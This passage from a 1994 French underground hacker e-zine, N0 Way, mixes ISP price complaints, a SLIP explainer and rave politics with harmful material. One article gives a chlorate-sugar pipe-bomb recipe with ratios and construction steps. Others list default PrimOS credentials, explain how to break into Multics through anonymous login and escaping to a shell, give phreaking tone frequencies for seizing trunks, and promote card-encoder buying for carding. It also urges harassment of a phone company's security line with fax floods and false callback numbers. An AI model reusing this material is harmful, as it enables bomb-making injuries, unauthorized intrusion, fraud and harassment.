80 F de l'heure pour le Full IP (FTP, Telnet, Mosaic etc...)
40 F de l'heure pour le Mail, News et IRC.
Je me suis dit:
"arghhh... putain c'est cher"
Et quelle connerie j'ai dit la, j'avais pas vu ce qui suivait.
Au mois de Juin et Juillet d'autres boites se sont fait connaitre:
>FranceNet qui fait passer son service pour de l'internet alors que c'est juste
un BBS connecté à l'internet qui ne permet pas de faire reellement du Dialup
IP, bref, c'est vraiment pour le con moyen qui sait pas se servir de son
clavier. En plus c'est hyper cher (36 68) et ca fonctionne träs mal!
>Calvanet : alors la c'est une arnaque incroyable... meme pas la peine d'en
parler. C'est la pourriture Calvacom revue et corrigee pour Internet.
>France Telecom et leur service internet: si vous avez plus de 10 000 F par
mois a mettre dans une liaison qui n'est meme pas permanent pour ce prix la,
vous pouvez toujours tenter.
J'ai rarement vu une boite qui ait le culot de faire cela quand meme! C'est
une honte !
Bref, dans les 4 fournisseurs World-Net, francenet, calvanet et l'offre FT,
c'est bien WorldNet qui est le moins cher.
Alors je recapitule les infos que j'ai eu sur eux (worldnet):
>Pas d'abonnement.
>Pour le Full IP : 80 F HT / heure
>Pour le Mail, News et IRC: 40 F / heure
pas d'autre frais. pas de frais à la mise en place. Ils peuvent fournir un
package de communication pour PC ou Mac.
Bref... c'est pas les prix fabuleux qu'on pourrais avoir aux US mais c'est
pas mal quand meme.
Voila, j'espere que ca vous évitera de vous faire pieger. J'ai des potes
pourtant pas trop naze qui se sont fait pieger par les arnaqueurs de
Francenet. Ca semble ne rien couter car c'est en 36 68 (2.19F / minute) et
quand tu recois la facture FT, il est deja trop tard !
Amusez vous bien avec Internet. ++NeurAlien.
P.S: J'ai une information tres tres tres interressante.
WorldNet fait une "semaine Worldnet" avec Internet gratuit pour n'importe
qui le demandant. C'est trop cool. Je me rappelle plus de la date mais
ils ont un service qui informe la dessus, c'est le 3615 Worldnet ou le
3617 SCT je crois.
Je met les coordonnées de téléphone de cette boite:
Tel: (1) 60 20 85 14
Hehe... moi c'est sur, je vais demander un compte pour ce truc !
Disclaimer:
J'en ai rien a foutre si mes propos font chier certainnes des boites
mentionnées (francenet, WorldNet, Calvanet, France Telecom, teaser
etc...). Ce que j'ai dit est vrai et si ca vous plait pas vous avez
qu'a àtre honnätes vous aussi. Je ne suis pas un politicien donc j'en
ai rien a cirer de l'avis des pseudo-VIP, je suis pas journaliste et
ceci n'est pas un journal alors les proces en diffamations vous pouvez
vous les mettre ou je pense.
A bon entendeur salut! ++NeurAlien.
| Dialup IP |
Vous entendez parler partout de Dialup IP et vous ne savez pas ce que
ca veut dire. Cette partie est sensée vous expliker cela!
Dans le temps, avant qu'Internet soit populaire, un vieux systäme
appelé UUCP permettait de recevoir son mail et ses news par "à coups" car il
fallait aller chercher ses informations sur le serveur et consulter en local.
Ensuite on a vu apparaitre pour les privilégié des accäs shell sur des
becannes reliées à l'Internet. A partir de la, on avait un terminal qui
permettait d'utiliser tous les outils d'Unix pour se connecter sur l'Internet:
telnet, FTP, IRC, gopher. Mais ca s'est vite trouvé dépassé. Par exemple, le
World Wide Websted (WWW) qui est un ensemble de serveurs multimédias reliés
par des liens hypertexte et qui fonctionne en reseau ne peut fonctionner
qu'avec un terminal ayant des capacite graphiques et sonores. Ce que
generalement les terminaux n'ont pas!
Bref, il a fallu s'adapter, c'est pour cela que le SLIP puis le PPP
ont été créé. Au lieu de se connecter avec un émulateur de terminal sur un
unix et de converser avec un Shell, la politique du SLIP & PPP est de
transformer le flux de paquet venant de l'Internet en quelque chose que l'on
peut passer sur le lien série du modem.
Donc PPP et SLIP servent à émuler en fait une liaison TCP/IP
(protocole Internet) sur une communication modem. Bien sur, cette liaison
n'est pas permanente.
Ainsi, on considäre la machine de l'utilisateur comme un noeud
temporaire d'un reseau connecté à Internet. Cette machine (qui peut àtre la
votre) possäde donc sa propre adresse. Il faut pour gerer ce flux de paquet
qui transite à travers le modem un "Client" PPP ou SLIP qui retransforme ca en
quelque chose d'exploitable par les "Clients" IRC, Mosaic (pour le WWW),
Telnet, FTP, Gopher, Mail, News.
(Le terme client désigne un programme qui va traiter l'information dispensée
par un serveur centralisé).
Avec PPP et SLIP vous pouvez envoyer vos propre paquet. C'est un peu
comme la victoire du combat qui se déroule sur le cable TV.
Les grosses compagnies veulent un systäme peu interactif qui permettra
seulement d'acheter avec son numéro de CB des programmes à la télé.
Les cyberpunks veulent un truc totalement interactif qui permet de proposer
soi màme ses propres service. SLIP et PPP vous permettent de proposer vos
propres services à l'ensemble du monde. Bien sur ces services sont
accessibles uniquement quand vous etes connecté.
Exemple pratique: emulation SLIP sous Windows.
Vous avez un PC.
Vous avez un modem 9600 minimum (19200 ou 28800 c'est le reve!).
Vous avez les logiciels Trumpet et WinSock.
Vous avez les clients Mail (Eudora), News, Mosaic, FTP etc...
Trumpet est le logiciel qui vous permet de vous connecter à un service vous
fournissant du SLIP.
WinSock permet d'émuler les sockets ("systeme de communication d'Internet"
(c'est pas exactement ca)) sous Windows.
Les clients exploitent les infos transmises par Trumpet puis WinSock.
schéma:
____________________________________________
| Client | Client | Client | Client | Client |
| Mail | FTP | Mosaic | News | Irc |
|(eudora)| | | | |
|--------+--------+--------+--------+--------|
| |
| WinSock |
| ( transforme les infos fournie par Trumpet |
| en sockets exploitable par les clients ) |
|--------------------------------------------|
| |
| Trumpett |
| ( assure la cnx SLIP et la reception des |
| paquets TCP/IP ) |
|--------------------------------------------|
| |
| couche Hard |
| communication modem en série |
| |
--------------------------------------------
L'avantage avec ce systäme est que l'on peut utiliser plusieurs
clients en màme temps: FTP, News et Mosaic par exemple.
C'est TRES TRES pratique.
Eh bien c'est sur ces mots que je referme la section "du coté d'internet".
++NeurAlien
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.14
[ Petite précision sur les explosifs:
Ce que je vais dire, tout le monde le sais: Les explosifs sont TRES dangereux.
Mais bon, on se dit: ouais, je vais assurer etc... mais ca c'est du N'IMPORTE
QUOI ! On ne maitrise jamais totalement ce genre de produit (màme les
artificiers professionels).
Un explosif amateur a un probleme: il n'est presque jamais stable, par contre
il est en général aussi fort que les explosifs professionels. Donc, il faut que
vous sachiez que chaque année il y a entre 10 et 100 gosse qui garderont a vie
des sequels de ce genre de connerie. (j'ai un ami qui doit tout le temps porter
des gants car sinon c'est vraiment pas beau!).
DECONNEZ PAS, faites vos mélanges en petite quantité et n'oubliez pas:
ce genre de mélange peut àtre MORTEL ! ++NeurAlien.]
-----------
L'explosif ? tient tient...
Ce jour la j'etais sceptique, on m'avait dit qu'un simple melange de sucre et de
desherbant (chlorate de soude) suffisait a faire de l'explosif. Au fait, sur les
paquet de petards, vous n' avez vous jamais lu 'Ne contient ni chlorate, ni
perchlorate' ? La tentation fut forte, et j'achetais le jour suivant les
ingredients...
Premiere preparation, quelques grammes, moitier sucre, moitier chlorate.
J'allume. Stupefaction, ca brulait tres vivement, une flamme jaune extremement
lumineuse, pendant quelques secondes, en meme temps ca degageait une fumee
blanche tres epaisse avec une odeur de caramel. (la decomposition spectrale est
en fait celle du sodium, 2 raies jaunes). Le melange a l'etat brute ne fait que
bruler a l'air libre. On dit que le compose fuse.
Pour l'utiliser en explosif il fallait donc enfermer le melange dans un tube.
J'avais confectionne un tube ouvert d'un cote, et que l'on pouvait ferme de
l'autre. J' y mettais dedans les celebres Mammouths. Du cote ouvert on pouvait
placer un projectile qui entrait dans le tube. Lorsque le petard claquait le
projectile ( ecrou + boulon qui bouchait bien l'entree ) etait expulse avec une
force suffisante pour percer une plaque de fer de 1/2 mm d'epaisseur. Bien sur
il me fallut peu de temps pour remplacer les Mammouths par le melange. J'avais
tasse au fond du tube une epaisseur de peut etre 5mm. Un trou dans le fond du
tube laissait passer une meche de petard, ce qui declancherais l'explosion
J'essaie. La detonnation fut sourde et grave, on sentait l'onde de choc. Le
fond du tube etait finalement eventre, decapite et plie en arcordeon rien qu'
avec la force du recule du tube lorsqu'il cogna dans un mur. Surpennant, avec si
peu de poudre...
Afin de perfectionner l'explosif, je fit quelques recherches. Meme le prof de
physique s'y etait mis ! Un sacre lascar du Cnrs d'ailleurs.
En voici les resultats:
Les meilleurs performances sont obtenues en melangeant 2/3 de sucre glace et
1/3 de chlorate en poids. Pour afiner les rapports il suffit de regarder ce qui
reste apres que l'on est fait fuser le melange: Reste du rose coulant -> un peu
trop de chlorate. Reste noir bousoufle -> trop de sucre. Ce melange augemente
ces performances lorsqu'il est humide au toucher. Il ne doit surtout pas etre
coulant. Il ne craint donc absolument pas l'humidite, au contraire. Le fin du
fin c'est de combiner de l'huile de vaseline. (Quasiment tous les explosifs pro
contiennent de l'huile de vaseline, mais cette operation est delicate a
realiser). Plus le melange est tasse plus ca pete fort. Ceci est en fait tres
important. Apres l'avoir tasse, ca doit etre un bloque dur. Pour le faire,
n'utilisez pas d'etau, de pinces etc..!!!! Ca vous peterait a la gueule, avant
meme d'avoir dit 'ouf..'
Il est important de remarquer que le melange fuse a partir de 50 degre C ! Le
melange est tellement instable, qu'il n'y a pas besoin de flamme pour que ca
demarre. Ceci explique aussi pourquoi il est sensible aux chocs (le choc
provoque un petit echauffement en un point, meme tres faible), donc attention
!!! pas de brutalite. Enfin le melange devient de plus en plus instable au cours
du temps s'il est tasse. Apres 24h, ca devient dangereux et risque de bruler (ou
peter) tout seul. On utilise au fur et a mesure qu'on fabrique. Une solution
pour en garder consiste a humudifier le melange, et le stocker dans un
congelateur a -18 deg. Mais mieux vaut l'eviter si on peut.
Apres la parfaite maitrise, je confectionnais un gros petard, avec 100 grammes
de melange tasse dans un bout de cadre de velo decoupe et ferme au bout a la
presse prealablement percer pour laisser passer une meche. -----> Ne percer pas
apres avoir mis le melange et fo prendre la precaution de mettre du papier
mouchoir ou Wc au bout du tube, afin d'etre sur que l'on ne presse pas le
melange !!!!!!!! Operation termine, je vais a la ZUP, ou les petards n'inquiete
depuis longtemps plus personne et ou la police ne vient pas. Je le pose sur une
plaque en beton des telecoms. J'allume la meche et je me retire mine de rien. De
toute ma vie je n'ai jamais entendu une telle detonnation ! Ce n'est pas
comparable, si bien qu'il m'ai tres difficile de la decrire. A entendre le bruit
j'ai pense que les plaques de beton de largement plus de 100kg et de 10cm
d'epaisseur etait integralement pulverisees. C'est une detonnation qui ne fait
pas mal aux oreilles. C'est un bruit tres puissant, tres sourd et tres grave,
un peu comme un coup de tonner ne fait pas mal aux oreilles. C'etait encore plus
grave, et certainement 10 fois plus forts ! Je crois qu'on arrive pas a se le
representer. Mais surtout ne vous bouche pas les oreilles ! Apres la detonnation
une grande fumee blanche se dissipa. Imaginer la tete des gens, on pense a un
attentat. D'ailleurs dans la minute qui suivit la detonnation personne n'a
ouvert la fenetre. L'onde de choc n'a heuresement pas brisee de vitres.
C'est ensuite seulement qu'on se dit, j'ai pris ca dans les mains, je l'ai
transporte dans un sac en plastique (jamais ds les poches), mais j'ai ete dingue
Vraiment si on s'imaginait la force que ca peut avoir, personne n'aurait le
courage d'en faire, et de loin ! On c'est bien marre, on a fait du 0 erreur, on
a eu beaucoup de chance, tout simplement. Se ne sont pas des choses qu'il faut
refaire a tour de bras. Faut etre raisonnable et lucide, a vous de voir.
A bon entendeur, salut !...
By Inlandsis.
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.15
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
diffuse publiquement.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= CORE-DUMP Issue 1 Phile 3 [NeurAlien] 13/01/92 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@\
@/ \@
@ Prime & the PrimOS Environment @
@ @
@ par @
@ @
@ NeurAlien @
@\ /@
\@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@/
Le Prime est un ordinateur a mi-chemin entre le gros ordinateur de
traitement lourd et l'ordinateur de gestion de conception plus legere.
Son systeme d'exploitation s'appelle le PrimOS et est un systeme proprietaire.
Il est multi-utilisateur et possede plusieurs modules des l'origine:
un module Basic, un autre de programmation pseudo-shell (batch) etc...
Le prime possede de nombreuses failles de securite. Notemment dans le
programme tour.
>L'acces au Prime:
=================
L'acces au Prime se fait par une base d'acces d'oó l'on peut lancer des
commandes de pre-login appelee PrimeNet. C'est en fait comme un service
d'accueil et de dispatching avec une machine par defaut.
Les prompts utilisé par le systäme de prélogin sont 'OK' et 'ER!'.
'OK' est affiché en premier, si vous tapez quelque chose d'incorrect, le Prime
vous répondra par un 'ER!'.
La banniäre ressemble a :
"Primenet V2.3"
Un message souvent vu sur Prime est:
Please Login
ER!
Cela veut dire que vous vous etes plante dans la commande et qu'il faut taper
login:
Primenet V 2.3 (system)
LOGIN<CR> (vous)
User id? (system)
AA1234 (vous)
Password? (system)
KILLME (vous)
OK, (system)
La principale commande etant bien sñr login.
syntaxe: login [<user>] [<password>] [-ON <host>] [-PROJECT <project_id>]
Le nom user est ecrit en majuscule comme la pluspart des commandes en PrimOS
d'ailleur. Une fonction interressante de PrimeNet est de pouvoir se logger
sur une machine autre que celle par defaut sans pour autant avoir a se logger
sur la machine par defaut.
Il vaut mieux essayer plusieurs logins par la commande
login <user> <password>
comme ca vous avez 3 essais au lieu d'un essai.
>Le systeme d'exploitation du Prime, PrimOS:
===========================================
La version actuelle de PrimOS doit etre la 22 ou la 23.
>Les commandes d'utilisation courante du systeme:
================================================
status users \_ : Affiche la liste des users, leur origine, leur etat
us /
all \_ : Affiche des infos sur toutes les activites du
al / systeme
comm : decrit les controlleurs de communication et leurs
etats respectifs.
devices : donne des informations sur les peripheriques
disks \_ : donne des informations sur les disques
di /
me : donne des infos sur soi meme.
network \_ : donne des infos sur les differents noeuds du reseau
net / PrimeNet.
project \_ : donne des infos sur les projets sur users
pro /
system \_ : donne des infos sur le PrimOS en train de tourner.
sys /
semaphores \_ : donnes des infos sur les semaphores actives
se /
units \_ : donne des infos sur les units ouverts
un /
listf \_ : donne le nom du dir, le peripherique et si on a des
l / ACLs dessus ou non.
slist <pathname> : affiche le fichier a l'ecran
login [<user>] [<password>] [-ON <host>] [-PROJET <projet_id>]
: ouvre un log sur la machine specifiee ou definie par
defaut avec le password et le projet specifie ou par
defaut.
date : affiche la date et l'heure
time : affiche les valeurs du registre de temps partage:
. connect time : temps depuis le login
. compute time : temps d'utilisation de
programmes
. I/O : temps d'utilisation d'un
Disk, Controlleur de comm ou
Device.
>Les communications:
===================
Les communications x25 se font par l'intermediaire de netlink qui est un
programme de communication.
on l'appelle comme suit:
netlink<cr>
Ce programme est en fait un sous systeme. Il vous reponds alors le prompt '>'.
Ici vous pouvez tapper diverses commandes:
c <DNIC>:<NUA> : appelle en collective call le NUA
nc <DNIC>:<NUA> : appelle normalement le NUA
>Les logins par defaut:
======================
User ids: Passwords:
--------- ----------
Admin
Games
Tools
Rje
Netman
Cmdnco
Demo
Regist
Prirun
Telenet
mail mail
prime prime / primos
primos_cs prime / primos
Primos
primenet primnet
mfd mfd
fam fam / Ver. 18 Primos \
system system < et en dessous >
dos dos \ --------- /
tele tele
netlink netlink
test test
guest guest
guest1 guest1/guest
>le mot de la fin:
=================
Ya pas mal de systäme Prime qui sont encore TRES ouverts à tout type de
pénétrations (hahaha). Alors pour les bons petits PADs tranquile, c'est kewl!
NeurAlien.
------------------
S0, G0 0N wif N0 Way !
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.16
<<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
</' `\>
<\ Rave Revolt />
<\ \>
<<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
-
PART I
-
Arggghhhhhhh!!!!! C'est le cri de la bete qui se reveille!
NON, je n'y crois pas, ce que je redoutais est arrivé: ce havre de repos
qu'etait le pont de Tolbiac a ete violé. Le sanctuaire a été profané par de
sales CRS baveux et grognants avides de baston. C'est vraiment le genre de
trucs qui m'ecoeurent: ils sont venus faire chier gratuitement des ravers
simplement car c'était pas déclaré. Encore cet enculé de Pasqua qui s'est
dit: "Hey merde, ils s'amusent bien là bas et ils sont pas emmerdés par les
flics car ils ne gànent personne".
Solution: hop, on se renseigne avec les RG et autres enculés civils puis on
leur envoie les CRS.
Bravo pour les méthodes... C'est d'une finesse....
Alors maintenant qu'ils ont fini de faire chier les raves ils commencent a
déranger les afters: RI-DI-CULES !
Il paraitrait màme qu'il est question d'interdire les raves au plan national.
La va falloir se secouer car les raisonnements précédents ne peuvent plus
s'appliquer: on pensait que l'interdictions des raves commerciales permettrait
à l'underground de se developper. Que nenni, ils s'attaquent directement à
l'underground!
Quelle sera la prochaine étape?
L'interdiction de TNT?
L'arrestation des organisateurs des raves?
(ca serait pas un mal pour E+ et d'autres...)
Il va falloir réagir contre toutes ces poussées sécuritaires et anti-
démocratiques. Nous y contribuons déja en diffusant No Way un peu partout!
-
PART II
-
Le Teknival UFO 23 du massif central a lui aussi été gäné par les keufs
une nouvelle fois.
Au début, tout se passait bien: le Teknival avait été installé dans un
champ präté aux organisateurs par un agriculteur du coins.
Tout se passait bien, a des kilometres des habitations. Pourtant, il y
a eu DES PLAINTES. Les gendarmes venaient à l'entrée du champs presque tous
les jours pour se renseigner aupräs des organisateurs. Le maire voulait virer
le teknival de sa commune. Le maire biensur n'y est pas arrivé. Ils ont donc
transmis l'affaire au prefet etc... Bref, comment faire chier pour rien les
ravers qui ne génaient personne.
On se balade dans le Teknival, a la recherche de bois pour le feu ou de
feu pour nos tàtes ;) et à chaque fois on entendait:
"Il parait qu'ils vont envoyer les CRS".
De charge de CRS, il n'y en a pas eu (a ma connaissance), par contre
ces personnes mal avisées se sotn permise de filtrer à la fin du Teknival
l'entrée au champ, ne laissant pas entrer les gens mais les laissant sortir.
Le champs s'est ainsi "vidé" au fur et à mesur des voyages.
La màme éternelle question se pose encore,
Mais que veulent ils?
++N.
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.17
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
diffuse publiquement.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= CORE-DUMP Issue 1 Phile 5 [NeurAlien] 14/01/92 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$
$$ $$
$$ Multics par NeurAlien $$
$$ $$
$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$ú$
Multics est encore un de ces OS depasses, vieux, obsoletes mais encore
vivant sur quelques coins retires, hameaux eloignes et ruraux de la
technopolis galopante que sont actuellement nos grands centre informatiques.
Les derniers Multics dont j'ai eu connaissance etaient a l'Universite de
Calgary au Canada, l'INRIA de Rocquencourt en France, Le CIRIL en France qui
a ete remplace lors de l'ete 1991 par un HP9000 et le CICT toujours en France.
(et puis aussi: Le ministere de la Culture et l'INRA.)
Multics est la source d'Unix. C'est un peu comme le pere d'Unix.
C'est un systeme tres lourds a gerer mais d'un efficacite, d'une fiabilite,
d'une organisation et d'une praticite telle que l'on se demande pourquoi
cet OS disparait. En effet, cet OS est certainnement un des meilleurs OS
developpe jusqu'a maintenant. La derniere version de Multics dont j'ai ete
temoins est la 12.0 je crois.
Le systeme est tres vaste donc ce texte ne sera qu'une presentation de
Multics.
1 Reconnaitre un Multics:
------------------------
Au login, la pluspart du temps, quand on se connecte sur un Multics, il
affiche:
<system> MULTICS version MRxx # oó xx est le numero de la version
Channel dhyyy at hhmm.s # yyy : canal de communication
# hhmm.s : heure format militaire
up since hhmm.s # date du dernier boot.
quelques autres informations et puis plus rien:
c'est la periode de prelogin.
1.1 Prelogin:
------------
Si vous connaissez les Cyber de Control Data Corporation comme les CDC960,
CDC980 etc... Ils sont sous NOS/VE et ont comme pour le Multics, une periode
de prelogin.
Celle ci est generalement limitee (environ a 2mn).
Le prelogin comporte plusieurs commandes primaires sous Multics:
help
l
et d'autres commandes de login anonyme sous un projet.
En effet, la gestion des utilisateurs sous MULTICS se fait par projet.
Il y a un responsable de projet qui dirige un groupe d'utilisateurs au point
de vue gestion. On designe un compte comme cela:
<Username>.<PROJECT>
Ainsi, lors du login, on peut soit taper le nom en entier, soit taper juste
le <Username>. Dans le dernier cas, le programme de login va detecter a quel
projet appartient cet utilisateur.
Une fonction interessante est la fonction de login anonyme.
En connaissant juste le nom d'un projet, on peut se logger anonymement sous ce
projet.
La syntaxe de cette commande est donnee au prelogin par le message de la
commande help.
1.2 Les principes:
-----------------
* Un utilisateur a toujours un nom qui commence par une majuscule. Ce compte
fait toujours partie d'un groupe appele 'projet'. On peut donc se logger
anonymement sous un projet sans avoir de nom de compte. On sera donc
identifie comme anonyme du projet xxxxx.
Un user peut faire partie de plusieurs projets.
* Le nom du projet xxxxx doit avoir pour premiere lettre une majuscule.
* Un 'segment' est le nom donne sous multics aux fichiers.
* un chemin est indique non pas avec des slash ('/') comme sous unix mais
avec des signes superieur: '>'
ex: >udd>PROJET>User
* le directory >udd> est le directory qui contient toutes les infos concernant
le utilisateurs.
* Se deplacer dans l'arborescence:
Si l'on est dans le directory: '>udd>PROJET1' et que l'on veut aller dans
'>udd', il suffit te taper 'cwd <'.
Si l'on est dans '>udd>PROJET1' et que l'on veut aller dans
'>udd>PROJET2>user1', il faut taper:
cwd <user1
* Dans la logique Multics, < equivaut a .. sous Unix et sous DOS (peurk...
je parle encore de cet OS pourri, le DOS.... bouhhh)
1.3 Les commandes:
-----------------
Voici une liste simple et absolument non exhaustive des commandes de multics;
ce sont les principales.
help <topic> : aide en ligne
ls : liste des fichiers sur directory courant
cwd <path> : pwd afficher le nom du directory courant
cd <newpath> : creer un nouveau directory dans le directory courant
dl <sedgment> : effacer un segment
who : affiche un court message sur l'etat de la machine et affiche
la liste des users actuellements connectes sur la machine.
whom : meme chose mais en classant les utilisateurs par projets.
sm : envoyer un message a un utilisateur online (equivalent a
write sous unix).
sdm : envoyer un courrier a un utilisateur.
Si la machine est connectee a un reseau comme Internet,
pour envoyer un mail a scc@nic.ddn.mil, il faut taper:
sdm scc -at nic.ddn.mil
rdm : lire sa boite aux lettres.
memo : systeme d'agenda tres evolue.
pr : affiche un segment a l'ecran.
ted : editeur ligne a ligne type ED.
emacs : editeur pleine page que vous connaissez.
l'utilisation de cet editeur est impossible avec une
liaison 7 bits. Il faut une liaison 8 bit pour utiliser ca!
basic : appel du compilateur basic.
pascal : appel du compilateur pascal.
calendar : affichage de calendrier.
date : affiche la date.
time : affiche l'heure.
st <filename> : affiche le statut d'un segment ou d'un directory.
la : liste des droits d'acces sur un segment ou un directory.
sa : etablit les droits d'acces sur un segment ou un directory.
logout : quitter Multics.
crossnet : envoyer du mail a travers differents réseaux.
2 Subversion:
------------
Par la methode de login anonymous, nous pouvont subvertir MULTICS en
reperant par un acces public qui est sous un certain projet.
Par exemple, pour l'interogation d'une bibliotheque ou d'un guide approfondi,
MULTICS affiche en debut de connexion des infos dont le projet.
Il suffit ensuite de faire un login anonyme sur ce projet.
Deuxieme methode.
Lors d'une connexion dirigee comme decrite precedemment, il faut stopper le
programme.
Pour cela on utilisera CONTROL+Z ou CONTROL+Q ou CONTROL+S ou CONTROL+D
ou CONTROL+D ou tout simplement un BREAK ou si vous avez un ATTN.
Ensuite, par la commande 'pi', on peut recuperer un interpreteur de commande.
Methode traditionnelle:
Eh bien, ca vous connaissez... TRY !!!! (in harlem brown.... ;-) private joke)
N'oubliez jamais que le permier caractere de Username doit toujours etre en
majuscule. Essayez les entrees communes.
ex: SysDaemon (celui ci, je l'ai jamais vu 'open')
3 Then... the end:
-----------------
Bon, j'avoue que ce texte est laconique mais ce systeme est tellement complet
et tellement peu repandu, que ce serait de la perte de temps de vous expliquer
tout si vous n'avez pas de becanne pour tester.
So long HPC[A]s men.
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.18
:) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
?) Tel - Trixx |)
@) By %)
B) NeurAlien I)
:) :-) ;) ;-) :\ :/ <:) *:) :} :{ 8)
-
7 Septembre 1994
-
"A new race of hacker seems to be born, Ultimate Hackers" --Anonymous
Hohe les Hack/phreakERS, les telcos évoluent et nous aussi. En exclusivité
quelques news d'un peu partout dans le monde qui vont vous faire sauter au
plafond.
Tout d'abord la HOPE (Hacking On Planet Earth) s'est déroulée dans le chaos le
plus complet. Il y avait beaucoup de "well known hackers" et quelques
évennements interressants s'y sont déroulés.
(Knight Lightning & Taran King molestent (tentent tout au moins) une fille
pendant qu'ils discutent avec Win Schwartau et Agent Steal)
L'unix mis a disposition des participant a été hacké comme on pouvait s'y
attendre.
("Hey Razor, have a look at them... It could help...
- Why?? I haven't been hacked... No... NOOOOOOOOOO... NOoOOoOooOoOO!!! You
hacked my system?")
Le nouveau systeme du métro de new york qui constituait le deuxiäme défi aux
hackers a lui aussi été vaicu. Il paraitrait (je ne l'ai pas vu) que la
personne l'ayant hacké soit actuellement recherchée. :)
(Fucking Pigz, GET A LIFE ! )
Au niveau des * Boxes, ca a fonctionné dur apparemment dans une folie
démoniaque. Certains pays semblent avoir été ouverts et une effervescence chez
les phone phreaks semble confirmer les bruits de grands "breakthrough" en
matiäre de phreaking. (R2 etc...)
Le X25 semblait mort, SevenUp nous dit le contraire: plusieurs centaines
d'appels par semaine sur SecTec. La nostalgie des anciens fait toujours peur
aux admins pour leur facture X25. (Hey Dale Drew, GET A LIFE !)
Allez, un ptit amuse gueule pour les lecteurs de N0 Way:
Frequences pour la malaisie:
Key Forward: 2600 + 2400 Hz : 150 ms
Between: 2000 ms
Seize: 2400 Hz : 150 ms
Intervals: 150 ms
CCITT5:
======
Tiens, info de nos amis de Hollande j'ai nomme Hack-Tic:
CCITT 5 serait utilisé au : Chili,
Philippines
South Africa
Colombie
Bresil
Essayez pour voir si ca passe...
Bribes récoltées un peu partout:
===============================
Saviez vous que GN Navetel fournit à la gendarmerie Canadienne des solutions
pour ecouter les transmissions de données et plus particulierement:
- les comms modems sur les BBS jusqu'au vitesse 28800.
- les comms satellites vers Taiwan & Singapour envoyées à 2Mbit/s aux
satellites par des "emissaires" de ces pays.
Afrique du Sud:
==============
2400/2600 puis 2400
Timings: 150/0/90/0 toujours en ms bien sñr
Chili:
=====
2400 ou 2550 pendant 3 secondes
seize: 2400 (ou 2460)
The recent hack:
===============
Net23 viens de se faire pirater. Net23 est un bon IP provider à New York.
Son administrateur qui a juste 15 ans était plutot vert. Well... qu'est ce qui
a pris aux hackers de lui modifier son kernel, de lui enlever netstat et ps?
Bref... pas kewl pour lui.
R2:
==
Pour seize'r un trunk en R2, il faut envoyer:
2040/2400 OU 2400/2400
ou == ou
2280 2280
ou ou
3000 3000
Nouvelles de l'armée:
====================
L'armée francaise a un beau reseau TCP/IP interne. C'est tres joli et c'est
dur d'y acceder. Mais alors, c'est COMPLETEMENT NUL AU NIVEAU PROTECTION:
des entrees avec root sans mot de passe!
tftp actif sur toutes les machines !
rexd en standard sur tous les HP.
Vous voulez vous marrer, essayez de votre caserne preférée ! :)
Quelqu'un à faire chier:
=======================
Service de securité de chez... FT:
Tel: (1) 44 44 22 22
Fax: (1) 42 68 19 38
Vous avez mon approbation pour donner le 44 44 22 22 comme numéro a vérifier
pour les achats par carte bleue ou numéro de rappel pour France Telecom pour
les renseignements quand vous etes dans une cabine.
Je suis aussi d'accord avec le fait que vous utilisiez votre fax modem pour
envoyer 450 pages NOIRES au 42 68 19 38 !
La blague du jour:
=================
"Comment transforme t'on un 486 en un 8088?"
"- En installant windows."
[Kopyrite Phrack 46]
Mag stripe Reader / Coder:
=========================
Beaucoup de personnes recherches des lecteurs encodeurs de cartes magnétiques.
Voila ou les acheter...
CPU ADvance
Post Office Box 2434
Harwood Station
Littletown, MA 01460
USA
Fax: 508-624-4819
L'unité coute 389 $ US et il y a 2 modeles:
un lecteur pr les pistes ISO 1 & 2
un autre pour les pistes ISO 2 & 3
Hehe.... Bon carding...
N0 Way recrute:
==============
Si la nuit vous revez (a part les trucs crades) aux catas, aux reseaux, aux
ordis, a la chasse aux inspecteurs, au trashing, a l'escalade des batiments de
FT.
Si votre oreiller est un Cisco 7000.
Si vous avez chez vous une antenne parabolique de 4 m de diametre motorisee
pour suivre les satellites de l'armee.
Si vous ne vous servez que d'une socket en raw IP pour faire du RPC.
Si vous vous servez de votre cafetiere pour faire des pates au café ;).
Si vous aimez router vous memes vos paquets en Source Routing.
Si vous etes né dans une éprouvette de LSD 25.
Alors nous avons besoin de vous pour ecrire des article dans N0 Way sur les
trucs les plus délirant, les plus techniques et les plus éclatants.
! Have phun wif that ! ++NeurAlien
On to the next one, on to the next one ! ! ! ++N.